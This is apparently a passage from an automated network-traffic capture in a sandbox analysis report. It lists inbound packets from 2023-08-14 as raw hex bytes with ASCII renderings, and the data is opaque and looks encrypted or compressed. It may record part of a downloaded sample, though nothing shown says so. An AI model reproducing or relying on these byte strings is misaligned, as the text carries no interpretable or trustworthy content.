2023-08-14 11:02:43 UTC	79	IN	Data Raw: 32 63 c8 19 05 8b 6b 30 89 2b 7f d8 e6 7f 6d 2c b4 7f 64 c0 f2 ea 83 9f 1b e9 85 f6 32 41 eb bb 06 02 13 be 2a 1e 2d b3 fa 87 72 9b 8d b9 9d c6 c0 46 b3 e7 3b 4b 5f 1a 26 5f 94 74 6b 0b 92 37 e5 5d 11 c9 67 85 d0 be a7 c8 d8 49 11 84 d1 1b d4 dd 37 cd 15 64 f9 fb 24 d3 40 fa 5d 87 69 e0 46 76 53 8b c5 00 79 7a 2a ae 4d 51 67 8d 84 a7 6b b8 ef 04 a6 27 f2 42 d9 e1 8c 2b c5 05 72 d7 8b 71 63 3b cb 71 d4 2c 24 92 06 b1 f7 a4 79 2c 40 cb 31 b0 b1 20 19 3c cd c8 2b 7c c6 ab 56 b8 23 a5 11 80 56 22 03 c4 0f 5e 20 fd 07 dd 3f 55 d7 cc 3d fa b5 58 3e 7f 5e 93 3f ef 0e b8 19 01 70 7b fd e7 90 66 e6 9f ce 14 fe 23 40 5e a2 70 e4 31 5d b4 7d 00 0a 1a b3 df 1f c1 3e f4 fd 9c 86 08 39 b7 e8 a4 b3 1e d9 5f 81 71 7e 68 b0 71 87 f4 04 b3 ff 87 44 ef 2b 0e e0 ff e7 50 88 Data Ascii: 2ck0+m,d2A-rF;K_&_tk7]gI7d$@]iFvSyzMQgk'B+rqc;q,$y,@1 <+\|V#V"^ ?U=X>^?p{f#@^p1]}>9_q~hqD+P
2023-08-14 11:02:43 UTC	80	IN	Data Raw: d8 ab 3a 49 81 c6 b4 4b 31 bb 7b 73 70 cb 03 f7 bb 05 87 7c e8 0e 46 c7 a2 68 1b af 4f 50 b7 0e d5 0c d3 25 79 0f 14 75 dd c4 17 0d 2d d3 fc bc ea 87 20 f8 8a 51 16 ac 22 10 35 d6 97 90 8b 01 59 2b 57 90 a3 5f 26 5f 09 61 9f 68 b3 fb b9 33 13 42 16 a5 8a b7 c0 0f 35 7e ef 11 61 1f 33 c5 a7 49 49 57 ff 8d e2 65 cc af 0e 8e a6 bd 48 b3 f3 ee 0f 90 30 e2 b6 3d cb 47 29 96 6a 41 83 ee 7f a0 92 19 4c fd cb 35 da 6d 30 50 87 fa 1d c9 39 d1 bf 3e 75 eb 4e 5b 84 81 1b 7a bd 52 70 71 6c a2 75 73 3f a9 1d a1 7d 8f 49 04 eb ec 43 45 63 be 52 40 62 90 dd 7f d5 9b 76 9c 86 f4 93 28 b5 88 e1 1c fb ec f7 86 9e c3 1f 65 cb a6 ab f1 bf 1c c3 b5 eb ac 72 c9 ed 70 62 5b db 98 99 fc 49 cb f9 f5 0b a0 ae f1 78 53 c0 58 50 73 7f 7c dd ef 9f 41 08 11 1b 3e 37 65 f3 c0 3f bb eb Data Ascii: :IK1{sp\|FhOP%yu- Q"5Y+W_&_ah3B5~a3IIWeH0=G)jAL5m0P9>uN[zRpqlus?}ICEcR@bv(erpb[IxSXPs\|A>7e?
2023-08-14 11:02:43 UTC	81	IN	Data Raw: 6f 02 5f 85 b2 7e fa 12 1f 17 39 6d ec 7d 6c 3b 51 9b 98 14 70 7d 8d d4 4f 6e d4 6a 9c 6c ab 0c a1 34 b2 67 00 c1 f1 f9 6f 5a 1c 15 90 bd 4b 11 f7 cb 0f 6a 27 2e 24 01 fe 5d 23 5d b6 32 46 7a 25 21 fd d5 f8 b8 e0 02 e6 c4 93 b4 a1 21 69 1c 9c 35 84 bd a9 aa 76 ce 3f 6c 84 f5 7d 15 f1 d6 b6 5d 5d c9 c0 4d 72 e0 67 17 e7 9b Data Ascii: o_~9m}l;Qp}Onjl4goZKj'.$]#]2Fz%!!i5v?l}]]Mrg
2023-08-14 11:02:43 UTC	82	IN	Data Raw: ff ab f1 51 82 c5 ce 09 df a2 d9 b8 74 cc 5e fa 5c b1 f6 cd 4c c6 77 e1 5e da db 6a 02 48 85 02 d3 8a c7 76 ed 91 12 f3 95 69 7c d2 8e 29 4e f5 47 5c 12 12 ed 40 b1 29 e1 90 07 10 a7 fb d2 06 f2 fb ad e7 52 85 24 be 82 85 90 d1 3b de 4b af 9a dc 37 47 dc 76 34 56 34 9c 24 4a 76 01 97 72 5f 0d 76 74 a3 51 55 94 2c 9a 9e 42 79 c1 06 11 1c 2e e7 5d 10 27 19 26 97 ce 4e c7 ee 8a f2 f3 2a d7 82 25 7f 2b c8 80 e3 a5 f7 a3 60 b0 ee f5 2a f9 ee 4a 00 21 1f 0d 78 e9 20 90 c8 8d 4d 01 f8 32 5c c6 1d 76 9f e0 fa 7e f1 0b ab 62 1f f0 80 e4 12 d7 39 f3 df 92 d9 d6 5b 68 60 64 fd d8 89 86 1b 6f 9c 83 88 78 e4 15 45 c4 14 ff e8 1d 1e 20 ef 38 3d ab 16 e5 4e cd dd b9 b8 26 9d 34 91 ae 3e 97 a6 dd 4a a3 b0 f6 cf d8 7b 8a 41 39 b4 8d e5 0d ce 3c d4 1d c2 de b7 60 b9 86 c7 Data Ascii: Qt^\Lw^jHvi\|)NG\@)R$;K7Gv4V4$Jvr_vtQU,By.]'&N%+`J!x M2\v~b9[h`doxE 8=N&4>J{A9<`
2023-08-14 11:02:43 UTC	83	IN	Data Raw: 4e 89 a6 59 83 21 e4 5e 81 b7 ee d7 a4 1f 05 4a 54 19 3d 8c 5a 5e c4 82 ae e9 af 24 e1 f2 a5 a4 4e 09 26 4c 92 02 0e 17 87 0d 0f ff f4 da 86 5a 23 dd da 12 5d 23 6d 83 9f af b1 fc 0d 3c c2 c0 c5 15 c2 e0 70 51 18 0b 52 d2 c8 d8 31 5e 95 c0 fe 3f 87 f1 dc 0d 55 82 36 bc 7d 72 6a bc 39 9f 81 ba cf 85 b1 a7 18 e9 46 53 c0 8b f2 08 6c 0e 93 be 86 16 d4 a9 a0 c5 ea 8d 1b a9 e0 f9 b1 56 45 0a 12 d7 1b 12 90 72 37 d4 23 6c e5 78 48 4d 9c aa 79 02 c1 99 24 b6 1a 9e e0 c6 95 98 b9 9f 3e cd 4f e8 22 bf cf 58 18 1b 8a d7 be c7 96 49 b3 be da a9 ef 84 13 fb 1c 43 b3 ca a8 2d 57 2c e0 13 32 66 72 c8 e3 60 9d 1b e7 aa 75 cc 36 57 09 39 ad 80 1f 8b c3 0a 8b 93 76 dd 13 43 30 ad 08 94 ff b8 fc e0 c9 0d fb 23 ed 70 1f 85 ae a8 58 fb 87 c5 55 9d f6 2e 1b e1 ad 13 4b f2 4e Data Ascii: NY!^JT=Z^$N&LZ#]#m<pQR1^?U6}rj9FSlVEr7#lxHMy$>O"XIC-W,2fr`u6W9vC0#pXU.KN
2023-08-14 11:02:43 UTC	84	IN	Data Raw: 75 db 18 cb 32 11 88 49 19 ce 55 c3 5f 8d c2 58 6e d0 af 78 46 22 c3 7b ad f7 d9 24 10 d2 1f c5 e3 41 b7 aa 9d f4 1e 09 67 cd 9a e5 fc 4c 40 93 f8 69 2f 11 25 21 75 3d 06 93 a7 74 09 c7 15 e9 ff 16 de 26 62 e3 1c 14 03 52 4a c0 bc e7 e9 ee ab 20 7e 73 c8 bd d7 da 0a 5a de 74 1e dd 5c 92 b7 9a 6b dd 34 ab ce 7c 82 62 f2 9a f5 a6 51 2e 9e 38 a1 15 17 0b 8f c7 07 dc db 28 d7 ad 45 f4 3e 49 09 59 26 d4 3f 6b 73 b0 7f 20 14 e6 ce c4 ac 9f ba 7f 53 46 ec 95 7d 35 9c 64 b4 a3 f6 f2 2e 6f a9 57 5c 46 06 53 93 15 e4 f8 16 2a 94 a4 14 fa 80 6e 9b 8d b9 9d ca 2a 73 52 24 37 f8 02 85 3c fd d4 e5 f0 0f 03 57 16 a2 ec 87 14 45 18 69 6a ca a1 1a 06 2a cf b9 e9 5e 72 60 61 f8 7c 44 e4 3f 52 05 ca f0 0f 18 ae 8f 1d 53 c5 7c 1e 86 3c f4 27 08 b1 a5 51 31 84 4f 85 04 a6 99 Data Ascii: u2IU_XnxF"{$AgL@i/%!u=t&bRJ ~sZt\k4\|bQ.8(E>IY&?ks SF}5d.oW\FSnsR$7<WEij*^r`a\|D?RS\|<'Q1O
2023-08-14 11:02:43 UTC	85	IN	Data Raw: fb 18 04 19 94 76 ec 18 5b 91 6c 9f 80 3e b6 b0 70 32 ea bc d9 42 cd 6a a5 28 e3 53 a2 fe 29 3f 1e 0e b1 09 56 2f f1 98 d5 b4 83 41 d9 6d 74 46 a9 2c 72 a8 72 20 dc 46 97 e4 42 06 3a 23 6b 71 27 d2 e9 70 e1 c1 3b da a7 04 ce cf e2 41 3a 3d 80 36 b2 82 0a dd b7 6e 40 fb 9d 0d f9 da 04 02 4f a5 5e 9f 7c 08 4a fb b8 95 06 d7 7d 2b 7a 81 16 70 15 43 b2 fe a0 2e 77 a5 99 21 f3 3a 57 57 fa 18 36 4c c4 81 c9 9e f9 27 20 68 ad c1 b6 73 ce 91 45 84 a9 79 7d 43 ab 7c aa 23 82 17 f1 ec 00 e2 01 dc 44 e7 ca 48 9e 32 ef 93 56 be 8a b8 db 22 49 b9 fe 6d b4 3b 4b 5a 18 df 6a f2 aa 56 ea e5 fc 81 44 68 0a fd 74 18 2b 90 30 1b d2 d9 fc 43 b0 df 1b 74 7e 05 e8 ec ce 2b 0e ca 92 07 f9 f5 dc 10 cb c2 9a 73 e0 60 bf 8d a9 00 72 51 b3 8c dc c9 57 6e 66 b7 3f e2 cd 4e e3 f7 67 Data Ascii: v[l>p2Bj(S)?V/AmtF,rr FB:#kq'p;A:=6n@O^\|J}+zpC.w!:WW6L' hsEy}C\|#DH2V"Im;KZjVDht+0Ct~+s`rQWnf?Ng
2023-08-14 11:02:43 UTC	86	IN	Data Raw: eb 30 dc ec d3 04 d5 e8 02 51 24 ac 5d fe 4d ec ff a0 4c f7 9e 47 8f f8 15 ec 29 03 7d 0c 2b 6d 9a cf 84 c0 e3 66 9f 65 f6 45 11 86 4b 14 cf 4b d3 15 f5 e8 64 8a 6e 68 5f 6f 09 9d e0 9f de e0 9a a7 5a d3 b2 b0 ba 2d d8 b3 ff 32 ec 4f bc 8e 33 88 e9 20 c6 7c 98 6a 13 69 8e bc 6a 87 a6 89 b4 9d 97 ef 72 20 3f 6c 94 a1 c7 e9 f5 4c 81 65 11 73 5a 08 13 2d 03 76 e0 39 ab 2b 53 6c 0c 03 6d e3 10 dc f3 71 3f 0d f5 bf 8b 84 ed b2 1a 7f b7 6b 3e d1 21 e8 24 6c 09 02 9d 6c 0d 66 d7 de 27 bf c4 9b e0 62 fc fd 48 57 01 e4 51 ff 63 0e ec 7f 0a 5d 50 ad 7a 4b 78 f7 dd 08 19 cf ae 25 73 fe 6d cb 67 40 ac b9 f1 57 a9 02 0a 10 8a 13 8f 19 43 ea c2 a1 52 3a 91 29 46 84 bd f0 23 43 5d c2 4a 84 c9 23 65 31 e2 3d db 00 57 c4 0f 27 19 8b 29 64 89 03 d8 7c 71 7e e1 99 59 37 c6 Data Ascii: 0Q$]MLG)}+mfeEKKdnh_oZ-2O3 \|jijr ?lLesZ-v9+Slmq?k>!$llf'bHWQc]PzKx%smg@WCR:)F#C]J#e1=W')d\|q~Y7
2023-08-14 11:02:43 UTC	88	IN	Data Raw: 22 e0 3d 47 65 5d d7 5c 94 ee a1 f2 01 17 34 b5 7c e4 8e d3 1c 9b 23 6d 8f 59 49 2e 21 de 11 3d ab 83 9f 18 4d a4 f0 4e c6 24 dc 0f 42 f2 07 d8 b0 af b4 6d 33 49 4e d7 63 8f 86 08 a7 52 89 c1 f1 da e2 c7 4c 86 f2 41 f5 39 ab 9a f5 5e 74 00 51 8f f1 bd d3 7b db bc ac 57 7c e4 1f 5d 73 f8 d1 f6 e5 4c ad 33 e3 3e 5b 17 ef 0f 99 a7 8b 8d a4 b3 d9 5c 3e 12 ed f3 43 c0 05 e2 57 d4 c8 67 0a d5 86 46 6b e0 38 62 39 1b 5a 5a 5d c5 1c e5 b2 4b 03 d1 c3 86 5d 3b 89 b7 18 52 97 cf 89 dd 5e 77 99 5f 5f 8e c7 18 28 e4 1d 05 ee 05 da b4 de 8d 7b 22 33 39 59 a7 00 1a 20 54 b1 58 9c 18 53 86 b2 8d cb b5 fb 27 c5 35 e7 a3 c5 f4 64 20 da 37 a4 cd e6 58 05 34 49 00 b3 b8 37 e2 e3 54 0f 87 68 57 42 cb cc 6b ee 57 bc ac 54 f4 e1 1e 5d 01 49 d1 1a 2e 76 59 d5 f3 c9 49 ef 46 5c Data Ascii: "=Ge]\4\|#mYI.!=MN$Bm3INcRLA9^tQ{W\|]sL3>[\>CWgFk8b9ZZ]K];R^w__({"39Y TXS'5d 7X4I7ThWBkWT]I.vYIF\
2023-08-14 11:02:43 UTC	89	IN	Data Raw: 08 7a bb 34 e4 09 12 2a 33 44 04 af 38 6d 8f 49 66 8b 50 1d 9b e4 80 78 6c cc ab 78 b8 78 bb ad 30 b1 d7 93 30 5b 2a 7a b8 ac fc 93 29 65 15 7e c6 da 5c 9d 2d b6 ab 75 6a 03 2a a4 5d b6 d7 9d 03 bc ef 95 e8 b1 45 6e 2f 6c a4 1f 7c a1 1c 3c 69 1b 78 61 19 c1 fa 8b fa 6c 4c 4f 92 3c 2f b4 3b 32 b1 2a 86 96 d1 24 12 71 6b 09 a2 3e 1f f3 2d 51 52 15 e5 80 21 97 94 83 e7 22 62 b0 d6 48 7e dc c3 37 c6 0c 4f 73 cf aa 75 3e 84 8a e3 7c 84 73 3c 6b dc 66 42 3c e6 33 d7 a7 93 01 69 63 43 e8 ea 75 62 65 2f 60 ae 00 b0 18 80 bf 72 92 44 af 19 a4 af 9a 70 79 4f dc a9 4f 99 b0 3c 1c 42 dd 3a 76 8d 10 62 25 69 0d 94 c9 a4 4c a3 1e 7e 9f ef 7f 27 94 25 fd be 29 0d 8a 91 b5 b2 c2 be 40 33 4d e3 1b bb 11 05 ec fa 53 d3 42 a6 dd 4a 17 6f 01 08 01 b9 21 e2 ce 2f 8d af 64 a9 Data Ascii: z43D8mIfPxlxx00[z)e~\-uj]En/l\|<ixalLO</;2$qk>-QR!"bH~7Osu>\|s<kfB<3icCube/`rDpyOO<B:vb%iL~'%)@3MSBJo!/d
2023-08-14 11:02:43 UTC	90	IN	Data Raw: 8b 27 26 8b f5 b6 d5 a2 4e 09 fe ba 04 8f d6 07 90 ae e2 7c 0d ed d2 5b a7 c7 a9 d9 62 fa 6a b1 e4 83 ee d7 cf 8e f5 4c 5b 02 47 ed 39 59 8c cc 3f f8 28 e1 b4 a7 92 8e 73 c7 88 ba f9 da 39 7d 8a 90 39 76 df 4b af c3 d0 04 c8 82 bb d1 5f f6 db 24 5e fd bf a4 f7 0f 01 1e 74 9b 59 b0 be c4 67 69 d0 86 52 73 78 e3 a2 ba d3 45 c3 f5 0a 1c d2 46 2e 18 92 90 c4 c2 4c a0 8e 80 1a 4d 35 97 9c a1 2f 97 d7 11 78 73 1e 2e 57 4c f2 f3 94 31 e9 a3 ed d8 de 42 0b bd 64 0c 6d 28 c9 62 e8 fa c4 1e 52 54 c1 e0 c8 8c 74 27 45 c4 d3 df 16 38 a6 a4 f6 0a 38 97 9e df 16 2e f4 61 b9 88 f1 cb 45 ba 5a 97 52 c8 f4 de 55 e1 68 c2 cd fe 57 07 8b 35 53 a4 8e 62 2c c8 cf fe 8c fb 42 1f 78 5c cf 44 de 73 7d 3f 53 b5 90 a9 d4 22 9d 9d 4d 41 cc a7 13 b6 b7 82 7a 7e 76 94 0e ec 18 1a 91 Data Ascii: '&N\|[bjL[G9Y?(s9}9vK_$^tYgiRsxEF.LM5/xs.WL1Bdm(bRTt'E88.aEZRUhW5Sb,Bx\Ds}?S"MAz~v
2023-08-14 11:02:43 UTC	91	IN	Data Raw: 5e ef 7f 5b b7 c7 7e 8b 5d bc 60 5e c4 3b 7d 76 d6 3b 37 52 27 bb 34 d2 93 bb 9c f2 ed c9 e0 f7 8b f0 70 66 2a bf ea e4 6a ae c3 a2 b8 e1 a7 15 15 76 79 75 80 4f 46 37 0f 87 ca c5 bd 0a 93 f9 42 dd 2d b2 9c 20 fc 3f 6f e7 41 aa 99 10 6e 81 de 44 f6 ad 98 b1 01 52 b0 5c 6c f4 4f dc 7e 09 9e 07 ce 62 0d 00 43 c0 0d b1 c3 e4 fc 39 51 7d ba ec 77 4c 2b 78 e3 65 e5 13 57 1f 6c 38 56 f3 60 f7 03 f3 de 7f 90 72 78 d6 b6 06 f9 8c 71 d5 55 b2 4e d0 44 41 7d 3d bb 88 cc 92 f1 b0 36 d9 ab cf 02 b5 ce 51 5d 74 d5 62 b5 f7 36 0b 48 59 ff 71 ea 89 f7 b1 5b 04 a7 c7 0d 14 5c ed cd 3b 1a cc 07 93 ff c2 a8 c0 2e 54 7f 05 36 d2 5c c9 e5 8d d2 97 dd 03 1d 35 ce 63 3c 3b c3 11 dd 0e e3 01 da 5a 06 9c 5b 27 f5 40 f3 b5 4f 59 37 32 49 e8 85 cb 3b 84 6f bb 8f bf 6b b0 86 5e 25 Data Ascii: ^[~]`^;}v;7R'4pf*jvyuOF7B- ?oAnDR\lO~bC9Q}wL+xeWl8V`rxqUNDA}=6Q]tb6HYq[\;.T6\5c<;Z['@OY72I;ok^%
2023-08-14 11:02:43 UTC	93	IN	Data Raw: 95 be af 08 17 2f c9 90 4a f6 39 b9 48 d1 28 45 af cc b6 ef cc 38 e6 0b 12 a2 3a 62 ec 1e 17 67 a5 5e 6d bd 1f 13 16 6a 09 d0 9e a6 a4 55 b6 41 ef 58 e4 3a 44 9c c2 07 24 b4 26 34 35 dc 0d 17 76 19 58 ca a3 16 70 54 26 86 e8 6f 2d 29 4a 89 ec ca fb 15 b7 5c c1 5f a8 7f 4d cb 4e 0a 18 6a 02 ef 04 0a 57 2c b3 9e 0e a1 d5 52 91 d9 d0 13 fe 88 a5 91 dd ba 62 c1 71 fd d0 51 5a c1 f8 f0 28 6b 82 1f e8 ce f2 44 c0 ae f4 ac ac 28 f1 95 26 81 fe 4b 59 b3 06 44 3a ff a1 9c 57 12 71 c0 b3 fc 8d e9 b8 6b b4 e0 12 c9 89 65 22 3a 38 de b2 78 4b 24 13 10 65 91 c3 02 57 21 b0 e7 5e 4a b9 5d 56 c2 bf c0 bd 1d 39 35 e7 49 8b d1 af 46 16 d5 37 98 ce 88 37 17 5c d0 73 fa 65 0f 15 e0 34 9e 8e ad 3a ff da 92 92 e7 20 08 83 4d e2 23 17 b0 ef 04 a6 71 e8 71 56 26 59 f7 19 fa c8 Data Ascii: /J9H(E8:bg^mjUAX:D$&45vXpT&o-)J\_MNjW,RbqQZ(kD(&KYD:Wqke":8xK$eW!^J]V95IF77\se4: M#qqV&Y
2023-08-14 11:02:43 UTC	94	IN	Data Raw: e3 2e f0 c3 58 f2 d9 35 5e ac d9 9e 31 85 36 ec 67 a9 26 e9 8a 65 53 53 61 ff 66 19 44 a1 98 84 b4 d1 41 8a 3e 20 29 fc 4a 24 dc 25 57 84 27 ce 96 18 63 3a 7f 6b 3c bd 22 70 8a 78 2a 82 8a a7 77 ce a0 e2 27 1e 09 b0 5b 80 fe 3e 8e 81 3f 78 ab dc 2c ba fb 41 18 4f 94 5e aa 2c 6d 4f cd b8 c9 06 98 7d 5e 7a f5 16 1c 15 2c b2 91 a0 45 77 f9 99 71 9c 48 27 38 9f 7e 58 25 c4 ed c9 fb d7 54 54 34 c0 8e c6 06 ce e5 45 e8 8c 16 0e 2c f7 17 80 23 82 44 f1 83 57 84 68 a8 2a 90 ae 29 f1 40 98 f6 25 e2 8a f5 8b 4b 3b da 91 1f d3 54 39 29 79 b0 07 94 8a 22 ac b9 95 ce 28 0e 6f 9b 07 71 2b f3 15 7e a1 85 a0 72 95 e9 68 5a 7e 35 cd b0 bd 64 52 bf b7 73 8a 99 80 7f ee ad e9 18 c5 3c cc dd a9 72 72 3e 96 ea af a0 0b 02 43 d2 4c 91 e8 12 90 b8 67 0f c3 40 b8 65 62 45 41 2b Data Ascii: .X5^16g&eSSafDA> )J$%W'c:k<"pxw'[>?x,AO^,mO}^z,EwqH'8~X%TT4E,#DWh)@%K;T9)y"(oq+~rhZ~5dRs<rr>CLg@ebEA+
2023-08-14 11:02:43 UTC	95	IN	Data Raw: 26 67 cd 35 8c 3f 89 90 fc 21 b1 fb 26 8f 8a 5b b0 40 53 1e 60 43 18 e8 a8 eb a9 8e 08 fa 16 f6 19 11 c0 19 40 a0 1b b0 49 9e a0 29 e5 0b 1b 33 1b 7d ee e0 9f de e0 c9 f4 2a bc d3 d6 c8 59 b3 c4 ff 53 af 3d d4 eb 41 d4 86 66 ab 1d f1 18 66 5b e3 e0 6a d7 a6 e5 e0 e8 fe 88 06 49 5e 02 fa d2 e7 b5 b7 0a f3 31 7e 23 2d 54 60 65 66 19 92 4a ab 5f 07 1f 63 03 1f c6 73 af 9b 2d 3f 4b ac de ea f6 83 92 7e 32 d2 0a 46 bf 7d 89 7d 0b 68 67 f3 1e 69 3a b2 8e 5f cd 86 f4 92 04 93 94 3f 3b 72 81 34 a3 11 5e ec 13 0a 28 15 ca 0a 22 11 99 be 7b 39 8b fe 44 01 8a 04 aa 11 1c cd 8d 92 65 d0 47 2a 24 c8 52 fd 5c 2c a8 b5 90 21 17 f4 68 34 b6 bd c3 23 73 1e ef 25 b0 aa 17 26 77 8d 09 b8 2d 0b 86 4d 14 6b b8 46 27 fe 2e ab 3a 14 4f 93 a0 59 02 c6 65 47 c9 9c 80 bb 97 4e 3d Data Ascii: &g5?!&[@S`C@I)3}YS=Aff[jI^1~#-T`efJ_cs-?K~2F}}hgi:_?;r4^("{9DeG$R\,!h4#s%&w-MkF'.:OYeGN=
2023-08-14 11:02:43 UTC	96	IN	Data Raw: e1 d3 e7 71 4d 51 b7 29 e4 eb c8 72 fa 4e 08 a3 79 2c 40 42 89 68 3e df ba fb 66 2c b4 83 56 a9 38 b8 45 62 fd 68 cd dd a0 c1 69 5e 55 3a ee 31 af aa 5b cf 44 fa db 9f d8 8f fe 6c b0 a0 7c b8 76 c6 93 8f 68 18 03 36 83 9f bd d3 55 db c4 a1 30 7c 88 31 5d 73 f8 fc d3 e5 3f d6 43 c1 7a 33 1d 9c 17 f7 b3 e6 90 a4 d6 d9 1a 5b 28 8e d1 3a ec 71 f4 33 e8 bb 76 78 de e7 58 0e ce 38 1a 5c 18 39 44 24 b5 68 80 d6 1b 62 a2 b0 d4 32 3a ed eb 18 15 b2 a0 fa 9b 02 23 f5 0f 30 d2 a0 6b 41 81 73 71 9d 71 f4 dd b4 e3 08 45 5c 4a 37 fb 00 59 20 3b 94 36 ef 76 0f e3 c2 ee b9 c1 9e 4e a3 5a 94 cd eb 87 0e 0e a9 43 a4 b5 c3 2c 76 34 15 4a c0 d9 5e b1 84 12 61 f3 07 27 2c cb bf 6b c0 16 cf ce 25 98 8d 7b 34 47 3d 85 7f 7e 76 59 a6 b2 a0 3c 88 32 32 e5 28 36 e0 dc 17 85 38 9f Data Ascii: qMQ)rNy,@Bh>f,V8Ebhi^U:1[Dl\|vh6U0\|1]s?Cz3[(:q3vxX8\9D$hb2:#0kAsqqE\J7Y ;6vNZC,v4J^a',k%{4G=~vY<22(68
2023-08-14 11:02:43 UTC	97	IN	Data Raw: 3d 6b e9 5e 04 e6 25 0a ee 35 1d e8 b0 ae 1d 05 be c5 15 d1 11 bb c3 15 d0 a4 ff 6c 0f 7a 03 d7 dc 8f f6 5d 65 77 7e a9 8a 24 f2 71 c4 fb 01 18 4d 45 d1 3b db be ff 6f d9 8a e7 9b b1 19 6e 0a 3f d7 70 7c c7 1c 48 69 6c 78 00 3c b3 89 ee a6 30 74 76 e2 5e 4a dd 58 41 c9 04 f5 f5 a5 4b 67 1c 0f 55 cb 75 70 9a 5e 05 0e 41 a6 d9 58 cb f6 d0 82 47 10 c3 b0 3b 11 b5 bb 58 9a 62 3f 00 bd aa 1a 3e e2 8a 8a 7c e8 20 59 04 af 00 6c 48 8f 44 b9 c6 fa 73 69 06 43 b4 ea 26 47 0c 5c 0d f2 6f 88 76 f0 eb 17 f3 27 db 61 cc dc fb 04 14 3a 80 cd 1f f0 c5 53 48 31 89 66 2f ce 4c 1b 76 0b 68 f1 ba d6 3f c5 77 11 f0 97 11 7b e7 75 fd cc 76 62 ee f7 d0 db a1 d2 40 56 4d 90 3e e7 62 20 b3 89 37 d3 27 a6 be 4a 17 6f 01 2d 6d ca 52 be af 62 fe c0 16 c6 c8 ca 26 65 4b bf fc 2f 9a Data Ascii: =k^%5lz]ew~$qME;on?p\|Hilx<0tv^JXAKgUup^AXG;Xb?>\| YlHDsiC&G\ov'a:SH1f/Lvh?w{uvb@VM>b 7'Jo-mRb&eK/
2023-08-14 11:02:43 UTC	99	IN	Data Raw: 66 fe ce 4d ee b8 6b e3 8e 96 3f 6c 82 be 36 cb aa 89 b8 26 94 03 d5 96 e6 8b a5 ac 8e 81 4c 34 27 35 9e 40 05 8c 99 6f 94 49 95 c0 d5 fa ef 27 81 e7 e2 bc 8a 41 21 ef e3 39 1f df 3f af a6 83 77 87 ac fd a9 0b 9b 8c 48 1f fd ed 81 b2 7c 5d 42 39 cc 36 d9 c4 aa 0e 2f bc f2 3e 03 19 c3 fe f9 9e 29 ac 9c 70 79 bb 28 42 6c fe cc a5 84 6c c1 da f6 72 22 40 e5 f2 c8 4b e3 b2 74 0a 00 7c 00 3e 28 80 92 f0 45 e9 a3 ed d8 8d 04 44 ee 22 5c 39 5a 9e 0d a9 8e 96 71 17 37 9d 8f 85 e0 1b 27 3f c4 ba 8c 7a 57 ca c2 97 7e 64 e0 d8 be 79 5c 87 04 ca d4 90 86 08 db 3b e5 3b bc 98 b7 55 8f 68 e2 9e ae 18 75 cd 5c 07 cf d9 10 6d b1 9d 92 c9 fb 1e 3a 28 2f a0 18 ad 24 09 6c 31 ea ff ef ac 76 c1 cd 1d 1d a3 f0 60 e5 c3 dd 18 38 19 c0 76 bc 18 34 91 67 9f 8d 3e bb b0 35 32 ac Data Ascii: fMk?l6&L4'5@oI'A!9?wH\|]B96/>)py(Bllr"@Kt\|>(ED"\9Zq7'?zW~dy\;;Uhu\m:(/$l1v`8v4g>52
2023-08-14 11:02:43 UTC	100	IN	Data Raw: 2b ed 31 9d 7c a9 72 d8 be db 2b a5 a2 ee bb 53 32 47 47 9b a5 0a 45 b0 26 c9 dd 85 ff 20 58 f4 4d 81 7a ee 94 97 ca 3c b9 74 a3 1f 64 02 96 d0 78 8e 6e f2 5e f4 73 7c 1f 15 0b 35 44 e4 ae d0 52 b5 1e eb 33 c2 32 e4 dd 14 17 36 be d4 ef 61 c2 fa f6 03 d4 9a 0c ad b5 17 6e 98 50 d8 98 c8 44 fe 8b 94 4d 69 45 90 28 09 6c 8e 21 bc 66 20 f0 16 c3 56 51 46 4c 2d 22 41 53 27 27 f9 f0 97 5f 33 b7 ad 93 b7 63 0f 17 e5 6f ab 72 cc 85 21 2a 64 95 89 84 cf d9 d3 41 cb bc 36 49 a1 7a 1a d9 dc 9d 28 26 01 34 f7 e6 86 ed 3e 91 35 43 77 19 65 57 64 c4 c5 36 75 76 1c d7 0c b0 86 d3 9a 8c d2 5c 2b de 9c b6 af 3f 74 cb 06 22 bd 5f 6f fc 87 8b c0 41 5b b9 83 eb 0f e4 d2 e0 a3 9e 68 9f 9d 68 5e 10 6d e8 33 1b 8b 18 d3 e1 7c 6f 17 e7 65 02 a5 90 00 d2 96 41 fe 83 4f 72 90 9a Data Ascii: +1\|r+S2GGE& XMz<tdxn^s\|5DR326anPDMiE(l!f VQFL-"AS''_3cor!*dA6Iz(&4>5CweWd6uv\+?t"_oA[hh^m3\|oeAOr
2023-08-14 11:02:43 UTC	101	IN	Data Raw: b5 24 ec 26 b8 46 2c 88 a5 ba 83 d1 42 f3 0b 42 b2 55 21 f1 5d 11 02 c4 2a 08 f4 22 60 0f 0b 13 b3 8b a6 e5 3a b9 24 bf 6a a5 5e 5d f0 ac 48 1c f1 67 61 32 ef 52 39 66 75 44 ca f3 16 11 54 55 86 9b 6f 5a 29 25 89 9e ca 9f 15 b7 5c c1 5f fb 7f 22 cb 28 0a 6c 6a 75 ef 65 0a 25 2c d6 9e 52 a1 9c 52 ff d9 b3 13 8c 88 c0 91 b9 ba 0b c1 3c fd b1 51 33 c1 94 f0 74 6b cb 1f 8c ce 97 44 ae ae 80 ac c5 28 85 95 4f 81 9b 4b 2a b3 06 44 6f ff d2 9c 32 12 03 c0 fd fc ec e9 d5 6b d1 e0 12 c9 89 65 72 3a 59 de c1 78 38 24 64 10 01 91 c3 02 57 21 e0 e7 11 4a e9 5d 65 c2 ec c0 d8 1d 4b 35 91 49 ee d1 dd 46 16 d5 37 98 9e 88 78 17 0c d0 40 fa 35 0f 7a e0 46 9e fa ad 3a ff da 92 d7 e7 4d 08 e2 4d 8b 23 7b b0 ef 04 f5 71 a5 71 02 26 09 f7 39 fa 8d d3 8b 71 63 51 d1 29 97 eb Data Ascii: $&F,BBU!]"`:$j^]Hga2R9fuDTUoZ)%\_"(ljue%,RR<Q3tkD(OKDo2ker:Yx8$dW!J]eK5IF7x@5zF:MM#{qq&9qcQ)
